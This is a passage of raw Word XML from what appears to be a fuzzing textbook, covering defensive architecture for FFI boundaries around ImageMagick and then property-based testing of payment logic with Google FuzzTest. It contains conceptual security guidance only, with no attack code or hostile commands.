        <w:t xml:space="preserve">The ultimate goal of practical FFI security testing is creating applications that can safely leverage the performance and functionality benefits of native libraries while maintaining the security guarantees that managed languages are designed to provide. This requires ongoing attention to FFI boundaries as both applications and their native library dependencies evolve over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your testing and prevention strategies now provide the foundation for building resilient applications that can withstand FFI boundary vulnerabilities. The final step involves implementing defensive architectures that limit vulnerability impact even when vulnerabilities exist in underlying native libraries.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="145"/>
    <w:bookmarkStart w:id="146" w:name="Xd6266d9e921ec5da45591c971a1488a4e1b1620"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Building Resilient Cross-Language Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve implemented FFI vulnerability testing and discovered several security issues in your applications' ImageMagick dependencies. But testing alone isn’t sufficient—​how do you architect applications that remain secure even when underlying native libraries contain undiscovered vulnerabilities? When should you implement process isolation versus input validation? How do you balance security improvements with the performance benefits that motivated using native libraries in the first place?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creating applications that remain secure despite FFI boundary vulnerabilities requires architectural approaches that acknowledge the tension between leveraging native library functionality and maintaining managed language security guarantees. You’ve learned to discover FFI vulnerabilities through focused AFL++ testing, but discovery alone isn’t sufficient—​you need defensive strategies that prevent these vulnerabilities from compromising application security even when they exist in underlying native libraries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process isolation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provides one of the most effective architectural approaches for limiting FFI vulnerability impact. When you isolate ImageMagick calls in separate processes, memory corruption in the native library can’t directly affect your main application’s memory space, interpreter state, or security context. This isolation comes with performance and complexity costs, but it transforms potentially catastrophic FFI vulnerabilities into limited availability issues that don’t compromise application security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security challenge with FFI boundaries extends beyond fixing individual vulnerabilities because native libraries often contain undiscovered vulnerabilities that won’t be found until security researchers apply advanced fuzzing techniques or attackers develop novel exploitation methods. Your applications must remain secure even when they depend on native libraries that contain unknown vulnerabilities, requiring defense-in-depth approaches that limit vulnerability impact rather than relying solely on vulnerability elimination.</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FFI Process Isolation Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Architecture for isolating native library calls in separate processes with secure communication mechanisms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Design and implement a framework that isolates FFI calls in separate processes, providing secure communication mechanisms between managed language applications and native library processes while maintaining reasonable performance characteristics.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resource constraints and monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provide essential components of FFI vulnerability mitigation by limiting the damage that native code vulnerabilities can cause even when they trigger successfully. Memory limits, execution time constraints, and file system access restrictions can prevent native vulnerabilities from causing resource exhaustion, infinite loops, or data corruption that affects application stability. However, these constraints must be carefully tuned to prevent legitimate functionality while effectively containing vulnerability impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Error handling and recovery mechanisms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">help ensure that FFI vulnerabilities cause graceful degradation rather than catastrophic failure. When ImageMagick calls fail due to memory corruption or other vulnerability-related issues, your application should have fallback mechanisms that maintain functionality using alternative approaches. This might involve using pure managed language implementations for critical functionality, implementing retry mechanisms with different input validation, or providing degraded functionality that doesn’t rely on potentially vulnerable native libraries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation and sanitization strategies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for FFI boundaries require understanding the specific vulnerability patterns that AFL++ testing reveals in your ImageMagick dependencies. Generic input validation might miss the subtle format corruptions or edge cases that trigger vulnerabilities while blocking legitimate use cases. Effective validation requires detailed knowledge of how different input characteristics interact with native library vulnerability patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Memory management coordination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between managed languages and native libraries requires careful attention to object lifecycle, resource cleanup, and error handling across FFI boundaries. When ImageMagick vulnerabilities trigger memory corruption, the corruption can interfere with normal cleanup mechanisms, leading to resource leaks or cleanup failures that accumulate over time. Defensive programming approaches must account for these failure modes and implement robust cleanup mechanisms that function correctly even when native code behaves unexpectedly.</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DIAGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defense-in-Depth FFI Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Comprehensive architectural diagram showing multiple layers of protection for FFI boundaries including process isolation, resource constraints, input validation, and monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Create a detailed architecture diagram showing how multiple defensive mechanisms work together to protect applications from FFI vulnerabilities, including the trade-offs and interactions between different protection approaches.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security monitoring and incident detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for FFI boundaries requires understanding the specific symptoms that indicate native vulnerability exploitation. Memory corruption in ImageMagick might manifest as garbage collection failures, unusual exception patterns, or performance anomalies rather than obvious crashes. Effective monitoring must recognize these indirect indicators and correlate them with potential security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">API design principles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can minimize FFI vulnerability exposure by limiting the attack surface available to potential attackers. When designing interfaces to ImageMagick, consider providing high-level APIs that limit the range of inputs that can reach potentially vulnerable native code. This might involve implementing safe wrappers around dangerous native library functionality or providing validation mechanisms that prevent obviously malicious inputs from reaching native processing logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance considerations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">become critical when implementing defensive mechanisms for FFI boundaries because excessive security controls can negate the performance benefits that motivate using native libraries in the first place. Effective defensive strategies must balance security improvements with performance requirements, potentially using techniques like selective sandboxing, risk-based input validation, or performance-optimized isolation mechanisms.</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FFI Security Monitoring Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Real-time monitoring system for detecting potential FFI vulnerability exploitation in production environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Develop a monitoring dashboard that tracks FFI-related security metrics, detects anomalous behavior patterns that might indicate vulnerability exploitation, and provides clear incident response guidance for FFI security issues.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Testing and validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of FFI defensive mechanisms requires ongoing verification that security controls continue to function correctly as applications and their native library dependencies evolve. This includes regression testing to ensure that security fixes don’t break application functionality, penetration testing to verify that defensive mechanisms actually prevent exploitation, and performance testing to ensure that security controls don’t create unacceptable performance degradation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal of resilient cross-language security architecture is creating applications that can safely leverage native library functionality while maintaining security guarantees even when those libraries contain vulnerabilities. This requires ongoing attention to FFI boundaries, structured defensive implementation, and continuous validation that security mechanisms function correctly in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building this resilient architecture completes your transformation from someone who tests individual components to a practitioner who can secure complex cross-language applications against both known and unknown vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="146"/>
    <w:bookmarkStart w:id="147" w:name="X22a21f8676c20ee0a50e3c20f8e0254e44bd6db"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 5 Recap: Mastering FFI Boundary Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve developed skills for understanding how memory corruption propagates across language boundaries to affect real applications. This chapter equipped you with practical techniques for discovering and mitigating FFI boundary vulnerabilities that allow native code corruption to compromise managed language security guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We started by examining why FFI boundaries represent significant security risks in modern applications. You learned that memory corruption in native libraries like ImageMagick doesn’t just affect the native code—​it can corrupt Python interpreter state, trigger Java garbage collection failures, or cause delayed crashes that are difficult to trace back to their root causes. Traditional security testing that focuses on managed language applications misses these vulnerability pathways.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The practical FFI testing techniques you mastered enable focused discovery of vulnerabilities at the boundaries where managed languages call native code. Using ImageMagick as a concrete example, you learned how to use AFL++ to discover native library vulnerabilities, then test how those same crashes affect Python and Java applications that call the library through FFI mechanisms. You can now identify double-free vulnerabilities that manifest differently when triggered through Python bindings and integer overflow issues that cause Java heap corruption when triggered through JNI calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your cross-boundary crash detection and analysis capabilities allow you to correlate native code vulnerabilities with their effects on managed language applications. You understand how memory corruption symptoms manifest across language boundaries, how to detect delayed crashes that occur during garbage collection cycles, and how to trace complex failure scenarios back to their original vulnerability triggers. This correlation ability helps you understand the actual impact of native vulnerabilities on your polyglot applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The practical FFI security testing and prevention strategies you learned provide frameworks for building focused security programs around FFI boundaries. You can prioritize testing based on actual risk exposure, develop effective input validation strategies that account for specific vulnerability patterns, and implement defensive architectures that limit vulnerability impact even when native libraries contain undiscovered vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The resilient cross-language security approaches you mastered enable building applications that safely leverage native library functionality while maintaining security guarantees. You understand how to implement process isolation, resource constraints, and monitoring systems that prevent FFI vulnerabilities from compromising broader application security, even when those vulnerabilities exist in third-party native libraries you can’t directly control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ImageMagick FFI testing techniques you’ve mastered apply broadly to other native libraries. File parsing libraries exhibit similar double-free patterns, cryptographic libraries show comparable buffer overflow risks, and compression libraries demonstrate equivalent integer overflow issues at FFI boundaries. Use ImageMagick as your learning foundation, then adapt these techniques to your specific native library dependencies that process untrusted input or perform complex data processing operations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkStart w:id="148" w:name="X324c4ffcd3ac1655720e0fa9550a7255c5e3b02"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Call to Action: Secure Your FFI Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your applications contain FFI boundary vulnerabilities that traditional security testing often misses. Every Python application that processes user uploads through ImageMagick, every Java service that calls native libraries through JNI, and every Node.js API that uses native modules represents a potential attack surface where memory corruption can compromise your managed language security guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start securing your FFI boundaries by identifying the highest-risk native library dependencies in your applications. Look for libraries that process untrusted input, perform complex parsing operations, or handle media processing—​these represent likely sources of exploitable vulnerabilities. Focus initially on the single most critical data path where user input flows through managed language code into native library processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement basic FFI testing by adapting the AFL++ techniques you learned in earlier chapters to test native libraries through their managed language bindings. Even focused testing that processes user upload samples through your Python image processing pipeline or Java document parsing workflow can reveal vulnerabilities that represent security risks in your production environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build monitoring systems that can detect the indirect symptoms of FFI vulnerability exploitation: unusual garbage collection patterns, memory allocation failures, or exception handling anomalies that might indicate native code corruption affecting managed language runtime behavior. These detection capabilities provide early warning of attacks that might otherwise go unnoticed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Don’t wait for comprehensive enterprise-scale solutions before starting FFI security testing. Begin with manual correlation between AFL++ findings in native libraries and their effects on your managed language applications. Even basic testing that verifies whether native crashes cause application instability provides valuable security intelligence that can guide remediation priorities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement defensive measures that limit FFI vulnerability impact regardless of whether you’ve discovered specific vulnerabilities. Input validation, resource constraints, and error handling improvements provide defense-in-depth protection that reduces the severity of both known and unknown FFI boundary vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The FFI vulnerabilities in your applications represent significant security risks in modern software because they bypass the security guarantees that developers expect from managed languages. Implementing focused FFI security testing helps you discover and address these vulnerabilities before they can be exploited in production environments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="148"/>
    <w:bookmarkStart w:id="149" w:name="X9e3ad8b81f4439c986a5373046541a305734fb0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transition to Chapter 6: Complex Input Format Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FFI boundary testing provides essential skills for discovering vulnerabilities at the interfaces between managed and native code, but it assumes that your fuzzing techniques can effectively exercise the complex input formats that modern applications must process. In reality, most applications handle structured data—​JSON APIs, XML configurations, protocol buffers, binary file formats, and domain-specific languages—​where traditional mutation-based fuzzing approaches achieve poor code coverage and miss critical parsing vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 6 shifts focus from integration boundaries to input complexity, teaching you to build grammar-aware and structure-preserving fuzzing techniques that maintain input validity while discovering deep vulnerabilities in complex parsers and data processing systems. You’ll learn why random byte mutations produce invalid inputs that get rejected by early validation checks, missing the parsing logic where the most severe vulnerabilities often hide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where this chapter taught you to test how vulnerabilities propagate across language boundaries, the next chapter teaches you to discover the complex parsing vulnerabilities that are most likely to be exploitable when they do propagate. These advanced input generation techniques dramatically improve the effectiveness of the FFI testing approaches you’ve just mastered by ensuring that your test cases reach the deep parsing logic where memory corruption vulnerabilities are most likely to occur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your FFI testing skills provide the framework for understanding how vulnerabilities affect real applications; Chapter 6 provides the advanced fuzzing techniques that discover the most sophisticated and dangerous vulnerabilities in the first place. Together, these capabilities enable comprehensive security testing that covers both vulnerability discovery and impact analysis across the full complexity of modern polyglot applications.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:pp: ++</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:id="188" w:name="Xfcca2d2051ebf8240831f3242db3038aa04c5de"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 4: Advanced Reliability Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">When Your Service Passes All Crash Tests But Still Fails Customers</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="151" w:name="Xeab23f7bb025c2fdc0aeaaef55cd682c351fe23"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Reliability Failure That Input-Based Testing Can’t Catch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Over the past three chapters, you’ve developed systematic crash discovery skills. You can set up AFL++ to find memory corruption issues in compiled code. You’ve learned to write effective harnesses that identify input processing failures. Your Docker-based testing setup has become a reliable part of your development workflow, catching crashes before they reach production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But yesterday, you encountered a different type of service failure. Customer Sarah completed her $299.99 purchase successfully—​the JSON parsing worked correctly, no memory corruption occurred, and your service processed the request without crashing. Yet somehow, during a brief network timeout, she got charged twice for the same order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scenario unfolded like this: Sarah clicked "Pay Now" during a network hiccup. Your service received the payment request and processed it successfully, but the response got lost in the timeout. Sarah’s browser automatically retried the request. Your service, seeing what appeared to be a new payment request with the same transaction ID, processed it again. Two charges, same order, angry customer calling your support team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The JSON was perfectly valid. No memory got corrupted. The service never crashed. But your service violated a fundamental business rule: "process each payment request exactly once, regardless of network conditions or retry behavior."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This represents a different class of service reliability challenge: business logic correctness. Your input-based testing skills excel at discovering crashes from malformed data, but they can’t verify that "each payment request processes exactly once" or "account balances never go negative" under various operational conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter introduces advanced reliability testing techniques that address different failure modes than input-based testing. You’ll use Google FuzzTest for property-based testing that verifies business logic correctness, differential testing that ensures behavioral consistency across service versions, and protocol-level fuzzing that applies your binary fuzzing skills to network communication. You’ll use the same Docker infrastructure, the same systematic exploration approach, and the same practical setup philosophy—​but you’ll discover reliability failures that input-focused testing cannot detect.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:bookmarkStart w:id="157" w:name="X335a0bf217e0a8306e45110ff83f7349ff2a2b9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property-Based Testing: Using Google FuzzTest for Business Logic Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remember the systematic exploration approach you learned with libFuzzer in Chapter 2? libFuzzer generated thousands of inputs to discover crashes in parsing logic. Google FuzzTest applies the same systematic exploration philosophy to business logic correctness through property verification—​but it’s a different tool designed specifically for this purpose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where libFuzzer excels at input validation testing, FuzzTest specializes in verifying that business rules hold under all conditions. Your duplicate payment bug represents exactly the type of failure that FuzzTest can discover through property-based testing: violations of business logic that don’t cause crashes but break customer expectations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="152" w:name="X645bbd0d5b980826667057662b52c66929f55ee"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Catching Your First Business Logic Bug in 30 Minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time to build a property test that catches duplicate payment processing before it affects customers. Your payment service already passes input validation testing—​but can it maintain business logic correctness when FuzzTest generates thousands of edge case scenarios?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property testing works differently than the input fuzzing you’ve mastered. Where AFL++ mutates file inputs to crash parsers, and input fuzzers generate malformed data to break validation logic, FuzzTest generates realistic business scenarios to verify correctness rules. Instead of asking "What input crashes this function?", you’re asking "What sequence of operations violates this business rule?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This harness demonstrates the systematic exploration that makes FuzzTest effective for business logic verification. Instead of generating malformed inputs to crash parsing logic, you generate realistic payment scenarios to verify business rule enforcement. FuzzTest explores thousands of timing and request patterns—​rapid successive requests, identical transaction IDs with different timestamps, retry scenarios with network delays—​discovering the specific conditions where duplicate processing occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The setup process leverages your existing Docker testing infrastructure but focuses on business logic rather than input validation. You’ll compile your service with FuzzTest instrumentation in the same Docker container, define the property that must hold (no duplicate charges), then watch systematic exploration uncover business logic edge cases that traditional testing approaches struggle to find.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can typically set up automated detection for business logic failures in 30-45 minutes—​issues that manual testing would be unlikely to discover efficiently. Notice how FuzzTest complements your existing crash testing rather than replacing it. AFL++ still prevents memory corruption in payment calculations. Input validation testing still catches parsing failures. FuzzTest adds business logic verification that ensures correct behavior even when parsing succeeds and memory remains uncorrupted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This complementary approach becomes crucial as you tackle more sophisticated business rules. Consider the complexity of a typical payment processing service: transaction validation, fraud detection, currency conversion, tax calculation, promotional discount application, refund processing, and chargeback handling. Each component contains business logic that must maintain correctness under all conditions, not just avoid crashes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkStart w:id="153" w:name="Xc390dcd63d47b0c289d512a021fd82a96d25408"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extending Property Testing to Complex Business Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your payment service likely enforces multiple business rules beyond duplicate prevention: "refunds cannot exceed original payment amounts," "promotional discounts apply only once per customer," "payment methods must be validated before processing." Each rule represents a property that FuzzTest can verify under systematic exploration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build comprehensive property suites that verify all critical business logic in your service. Generate edge case scenarios systematically with FuzzTest rather than relying on manual test case creation that inevitably misses corner cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic exploration can help identify business logic edge cases that cause significant customer trust damage: negative account balances from race conditions, applied discounts that violate business rules, refunds that exceed original payment amounts. Each property violation provides exact reproduction steps for complex business logic bugs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
